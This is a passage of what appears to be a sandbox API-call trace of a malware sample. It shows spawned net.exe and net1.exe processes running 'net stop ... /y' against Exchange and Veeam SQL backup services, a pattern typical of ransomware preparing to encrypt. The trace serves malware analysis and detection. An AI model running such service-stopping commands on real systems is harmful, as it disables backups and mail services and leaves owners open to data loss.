AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 376 os_tid = 0x2b4 [0203.262] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfd60 | out: lpSystemTimeAsFileTime=0x1dfd60*(dwLowDateTime=0x42580500, dwHighDateTime=0x1d57a87)) [0203.262] GetCurrentProcessId () returned 0x40c [0203.262] GetCurrentThreadId () returned 0x2b4 [0203.262] GetTickCount () returned 0x116c717 [0203.262] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfd58 | out: lpPerformanceCount=0x1dfd58*=32354630250) returned 1 [0203.262] GetModuleHandleA (lpModuleName=0x0) returned 0x580000 [0203.262] __set_app_type (_Type=0x1) [0203.262] __p__fmode () returned 0x74eb31f4 [0203.262] __p__commode () returned 0x74eb31fc [0203.262] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x58ffe6) returned 0x0 [0203.262] __getmainargs (in: _Argc=0x599064, _Argv=0x59906c, _Env=0x599068, _DoWildCard=0, _StartInfo=0x599024 | out: _Argc=0x599064, _Argv=0x59906c, _Env=0x599068) returned 0 [0203.262] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.262] GetConsoleOutputCP () returned 0x1b5 [0203.263] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x599080 | out: lpCPInfo=0x599080) returned 1 [0203.263] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.265] sprintf_s (in: _DstBuf=0x1dfd18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0203.266] setlocale (category=0, locale=".437") returned="English_United States.437" [0203.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0203.267] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0203.267] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSRS /y" [0203.267] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1dfae4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0203.268] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x6e) returned 0x703c10 [0203.268] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0203.268] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfce8 | out: Buffer=0x1dfce8*=0x701c70) returned 0x0 [0203.268] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfce8 | out: Buffer=0x1dfce8*=0x701c88) returned 0x0 [0203.268] _fileno (_File=0x74eb2900) returned -2 [0203.268] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0203.268] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0203.268] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0203.268] _wcsicmp (_String1="config", _String2="stop") returned -16 [0203.268] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0203.268] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0203.268] _wcsicmp (_String1="file", _String2="stop") returned -13 [0203.268] _wcsicmp (_String1="files", _String2="stop") returned -13 [0203.268] _wcsicmp (_String1="group", _String2="stop") returned -12 [0203.268] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0203.268] _wcsicmp (_String1="help", _String2="stop") returned -11 [0203.268] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0203.268] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0203.269] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0203.269] _wcsicmp (_String1="session", _String2="stop") returned -15 [0203.269] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0203.269] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0203.269] _wcsicmp (_String1="share", _String2="stop") returned -12 [0203.269] _wcsicmp (_String1="start", _String2="stop") returned -14 [0203.269] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0203.269] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0203.269] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0203.269] _wcsicmp (_String1="accounts", _String2="MSExchangeSRS") returned -12 [0203.269] _wcsicmp (_String1="computer", _String2="MSExchangeSRS") returned -10 [0203.269] _wcsicmp (_String1="config", _String2="MSExchangeSRS") returned -10 [0203.269] _wcsicmp (_String1="continue", _String2="MSExchangeSRS") returned -10 [0203.269] _wcsicmp (_String1="cont", _String2="MSExchangeSRS") returned -10 [0203.269] _wcsicmp (_String1="file", _String2="MSExchangeSRS") returned -7 [0203.269] _wcsicmp (_String1="files", _String2="MSExchangeSRS") returned -7 [0203.269] _wcsicmp (_String1="group", _String2="MSExchangeSRS") returned -6 [0203.269] _wcsicmp (_String1="groups", _String2="MSExchangeSRS") returned -6 [0203.269] _wcsicmp (_String1="help", _String2="MSExchangeSRS") returned -5 [0203.269] _wcsicmp (_String1="helpmsg", _String2="MSExchangeSRS") returned -5 [0203.269] _wcsicmp (_String1="localgroup", _String2="MSExchangeSRS") returned -1 [0203.269] _wcsicmp (_String1="pause", _String2="MSExchangeSRS") returned 3 [0203.269] _wcsicmp (_String1="session", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="sessions", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="sess", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="share", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="start", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="stats", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="statistics", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="stop", _String2="MSExchangeSRS") returned 6 [0203.269] _wcsicmp (_String1="time", _String2="MSExchangeSRS") returned 7 [0203.269] _wcsicmp (_String1="user", _String2="MSExchangeSRS") returned 8 [0203.269] _wcsicmp (_String1="users", _String2="MSExchangeSRS") returned 8 [0203.269] _wcsicmp (_String1="msg", _String2="MSExchangeSRS") returned 2 [0203.269] _wcsicmp (_String1="messenger", _String2="MSExchangeSRS") returned -14 [0203.269] _wcsicmp (_String1="receiver", _String2="MSExchangeSRS") returned 5 [0203.269] _wcsicmp (_String1="rcv", _String2="MSExchangeSRS") returned 5 [0203.269] _wcsicmp (_String1="netpopup", _String2="MSExchangeSRS") returned 1 [0203.270] _wcsicmp (_String1="redirector", _String2="MSExchangeSRS") returned 5 [0203.270] _wcsicmp (_String1="redir", _String2="MSExchangeSRS") returned 5 [0203.270] _wcsicmp (_String1="rdr", _String2="MSExchangeSRS") returned 5 [0203.270] _wcsicmp (_String1="workstation", _String2="MSExchangeSRS") returned 10 [0203.270] _wcsicmp (_String1="work", _String2="MSExchangeSRS") returned 10 [0203.270] _wcsicmp (_String1="wksta", _String2="MSExchangeSRS") returned 10 [0203.270] _wcsicmp (_String1="prdr", _String2="MSExchangeSRS") returned 3 [0203.270] _wcsicmp (_String1="devrdr", _String2="MSExchangeSRS") returned -9 [0203.270] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeSRS") returned -1 [0203.270] _wcsicmp (_String1="server", _String2="MSExchangeSRS") returned 6 [0203.270] _wcsicmp (_String1="svr", _String2="MSExchangeSRS") returned 6 [0203.270] _wcsicmp (_String1="srv", _String2="MSExchangeSRS") returned 6 [0203.270] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeSRS") returned -1 [0203.270] _wcsicmp (_String1="alerter", _String2="MSExchangeSRS") returned -12 [0203.270] _wcsicmp (_String1="netlogon", _String2="MSExchangeSRS") returned 1 [0203.270] _wcsupr (in: _String="MSExchangeSRS" | out: _String="MSEXCHANGESRS") returned="MSEXCHANGESRS" [0203.270] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7054d0 [0203.305] GetServiceKeyNameW (in: hSCManager=0x7054d0, lpDisplayName="MSEXCHANGESRS", lpServiceName=0x59aaf0, lpcchBuffer=0x1dfc84 | out: lpServiceName="", lpcchBuffer=0x1dfc84) returned 0 [0203.306] _wcsicmp (_String1="msg", _String2="MSEXCHANGESRS") returned 2 [0203.306] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESRS") returned -14 [0203.306] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESRS") returned 5 [0203.306] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESRS") returned 5 [0203.306] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESRS") returned 5 [0203.306] _wcsicmp (_String1="redir", _String2="MSEXCHANGESRS") returned 5 [0203.306] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESRS") returned 5 [0203.306] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESRS") returned 10 [0203.306] _wcsicmp (_String1="work", _String2="MSEXCHANGESRS") returned 10 [0203.306] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESRS") returned 10 [0203.306] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESRS") returned 3 [0203.306] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESRS") returned -9 [0203.306] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESRS") returned -1 [0203.306] _wcsicmp (_String1="server", _String2="MSEXCHANGESRS") returned 6 [0203.306] _wcsicmp (_String1="svr", _String2="MSEXCHANGESRS") returned 6 [0203.306] _wcsicmp (_String1="srv", _String2="MSEXCHANGESRS") returned 6 [0203.306] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESRS") returned -1 [0203.306] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESRS") returned -12 [0203.306] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESRS") returned 1 [0203.307] NetServiceControl (in: servername=0x0, service="MSEXCHANGESRS", opcode=0x0, arg=0x0, bufptr=0x1dfc80 | out: bufptr=0x1dfc80) returned 0x889 [0203.308] wcscpy_s (in: _Destination=0x59a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0203.308] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0203.310] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x59b338, nSize=0x800, Arguments=0x599dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0203.311] GetFileType (hFile=0x26c) returned 0x3 [0203.312] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x704000 [0203.312] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x704000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0203.312] WriteFile (in: hFile=0x26c, lpBuffer=0x704000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1dfbc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfbc0, lpOverlapped=0x0) returned 0 [0203.312] LocalFree (hMem=0x704000) returned 0x0 [0203.312] GetFileType (hFile=0x26c) returned 0x3 [0203.312] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7062a8 [0203.312] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7062a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0203.312] WriteFile (in: hFile=0x26c, lpBuffer=0x7062a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1dfbc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfbc0, lpOverlapped=0x0) returned 0 [0203.312] LocalFree (hMem=0x7062a8) returned 0x0 [0203.312] _ultow (in: _Dest=0x889, _Radix=1965040 | out: _Dest=0x889) returned="2185" [0203.312] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x59b338, nSize=0x800, Arguments=0x599dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0203.312] GetFileType (hFile=0x26c) returned 0x3 [0203.312] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7062a8 [0203.312] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7062a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0203.312] WriteFile (in: hFile=0x26c, lpBuffer=0x7062a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1dfbcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfbcc, lpOverlapped=0x0) returned 0 [0203.312] LocalFree (hMem=0x7062a8) returned 0x0 [0203.312] GetFileType (hFile=0x26c) returned 0x3 [0203.312] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7062a8 [0203.312] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7062a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0203.312] WriteFile (in: hFile=0x26c, lpBuffer=0x7062a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1dfbcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfbcc, lpOverlapped=0x0) returned 0 [0203.312] LocalFree (hMem=0x7062a8) returned 0x0 [0203.313] NetApiBufferFree (Buffer=0x701c70) returned 0x0 [0203.313] NetApiBufferFree (Buffer=0x701c88) returned 0x0 [0203.313] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSRS /y" [0203.313] exit (_Code=2) Process: id = "204" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x69ac2000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 377 os_tid = 0x414 Process: id = "205" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x492000" os_pid = "0x130" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "204" os_parent_pid = "0xba0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 378 os_tid = 0x688 [0203.493] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfa30 | out: lpSystemTimeAsFileTime=0x2dfa30*(dwLowDateTime=0x427bb9a0, dwHighDateTime=0x1d57a87)) [0203.493] GetCurrentProcessId () returned 0x130 [0203.493] GetCurrentThreadId () returned 0x688 [0203.493] GetTickCount () returned 0x116c801 [0203.493] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfa28 | out: lpPerformanceCount=0x2dfa28*=32377761083) returned 1 [0203.493] GetModuleHandleA (lpModuleName=0x0) returned 0xf30000 [0203.493] __set_app_type (_Type=0x1) [0203.493] __p__fmode () returned 0x74eb31f4 [0203.493] __p__commode () returned 0x74eb31fc [0203.494] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf3ffe6) returned 0x0 [0203.494] __getmainargs (in: _Argc=0xf49064, _Argv=0xf4906c, _Env=0xf49068, _DoWildCard=0, _StartInfo=0xf49024 | out: _Argc=0xf49064, _Argv=0xf4906c, _Env=0xf49068) returned 0 [0203.494] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.494] GetConsoleOutputCP () returned 0x1b5 [0203.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf49080 | out: lpCPInfo=0xf49080) returned 1 [0203.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.497] sprintf_s (in: _DstBuf=0x2df9e8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0203.497] setlocale (category=0, locale=".437") returned="English_United States.437" [0203.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0203.499] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0203.499] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0203.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2df7b4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0203.499] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x82) returned 0x6d4bf8 [0203.499] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0203.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df9b8 | out: Buffer=0x2df9b8*=0x6d1c90) returned 0x0 [0203.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df9b8 | out: Buffer=0x2df9b8*=0x6d1ca8) returned 0x0 [0203.500] _fileno (_File=0x74eb2900) returned -2 [0203.500] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0203.500] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0203.500] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0203.500] _wcsicmp (_String1="config", _String2="stop") returned -16 [0203.500] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0203.500] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0203.500] _wcsicmp (_String1="file", _String2="stop") returned -13 [0203.500] _wcsicmp (_String1="files", _String2="stop") returned -13 [0203.500] _wcsicmp (_String1="group", _String2="stop") returned -12 [0203.500] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0203.500] _wcsicmp (_String1="help", _String2="stop") returned -11 [0203.500] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0203.500] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0203.500] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0203.500] _wcsicmp (_String1="session", _String2="stop") returned -15 [0203.500] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0203.500] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0203.500] _wcsicmp (_String1="share", _String2="stop") returned -12 [0203.500] _wcsicmp (_String1="start", _String2="stop") returned -14 [0203.500] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0203.500] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0203.500] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0203.500] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0203.500] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0203.500] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0203.500] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0203.500] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0203.500] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0203.500] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0203.500] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0203.501] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0203.501] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0203.501] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0203.501] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0203.501] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0203.501] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0203.501] _wcsicmp (_String1="sessions", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0203.501] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0203.501] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2008R2") returned -9 [0203.501] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0203.501] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0203.501] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0203.501] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0203.501] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0203.501] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0203.501] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0203.501] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0203.501] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0203.501] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0203.501] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0203.501] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0203.501] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0203.501] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0203.501] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0203.501] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0203.501] _wcsicmp (_String1="work", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0203.501] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0203.501] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0203.501] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -15 [0203.501] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0203.501] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0203.501] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2008R2") returned 5 [0203.501] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0203.501] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0203.501] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0203.501] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0203.502] _wcsupr (in: _String="SQLAgent$VEEAMSQL2008R2" | out: _String="SQLAGENT$VEEAMSQL2008R2") returned="SQLAGENT$VEEAMSQL2008R2" [0203.502] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6d54d0 [0203.505] GetServiceKeyNameW (in: hSCManager=0x6d54d0, lpDisplayName="SQLAGENT$VEEAMSQL2008R2", lpServiceName=0xf4aaf0, lpcchBuffer=0x2df954 | out: lpServiceName="", lpcchBuffer=0x2df954) returned 0 [0203.505] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0203.505] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0203.505] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0203.505] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0203.505] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0203.505] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0203.505] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0203.505] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0203.505] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0203.505] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0203.505] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -3 [0203.505] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -15 [0203.505] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0203.505] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2008R2") returned -12 [0203.505] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2008R2") returned 5 [0203.505] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2008R2") returned 1 [0203.505] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0203.505] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2008R2") returned -18 [0203.505] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2008R2") returned -5 [0203.506] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x2df950 | out: bufptr=0x2df950) returned 0x889 [0203.506] wcscpy_s (in: _Destination=0xf4a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0203.506] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0203.507] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xf4b338, nSize=0x800, Arguments=0xf49dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0203.508] GetFileType (hFile=0x26c) returned 0x3 [0203.508] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6d3ca0 [0203.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6d3ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0203.508] WriteFile (in: hFile=0x26c, lpBuffer=0x6d3ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2df890, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df890, lpOverlapped=0x0) returned 0 [0203.508] LocalFree (hMem=0x6d3ca0) returned 0x0 [0203.508] GetFileType (hFile=0x26c) returned 0x3 [0203.508] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d6298 [0203.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6d6298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nm", lpUsedDefaultChar=0x0) returned 2 [0203.508] WriteFile (in: hFile=0x26c, lpBuffer=0x6d6298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df890, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df890, lpOverlapped=0x0) returned 0 [0203.508] LocalFree (hMem=0x6d6298) returned 0x0 [0203.509] _ultow (in: _Dest=0x889, _Radix=3012800 | out: _Dest=0x889) returned="2185" [0203.509] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf4b338, nSize=0x800, 